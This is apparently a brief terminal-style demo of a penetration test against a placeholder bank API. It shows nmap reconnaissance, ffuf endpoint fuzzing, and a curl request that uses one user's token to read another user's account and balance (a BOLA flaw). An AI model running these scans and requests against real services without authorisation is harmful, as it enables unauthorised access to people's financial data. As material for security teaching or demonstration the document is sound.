# Phase 1: RECONNAISSANCE
deniz@dc-infosec:~$ nmap -sV -sC -p 443 api.target-bank.com
PORT STATE SERVICE VERSION
443/tcp open ssl/http nginx 1.18.0
# Phase 2: API ENUMERATION
deniz@dc-infosec:~$ ffuf -u https://api.target-bank.com/v1/FUZZ -w api-wordlist.txt
[200] /v1/accounts [200] /v1/transactions
# Phase 3: EXPLOITATION (BOLA)
deniz@dc-infosec:~$ curl -s -H "Authorization: Bearer $TOKEN_A" \
https://api.target-bank.com/v1/accounts/100046
HTTP/1.1 200 OK
{ "account_id": 100046, "owner": "VICTIM_B", "balance": "EUR 47.230,00" }
# ✗ BOLA CONFIRMED: UNAUTHORIZED CROSS-ACCOUNT ACCESS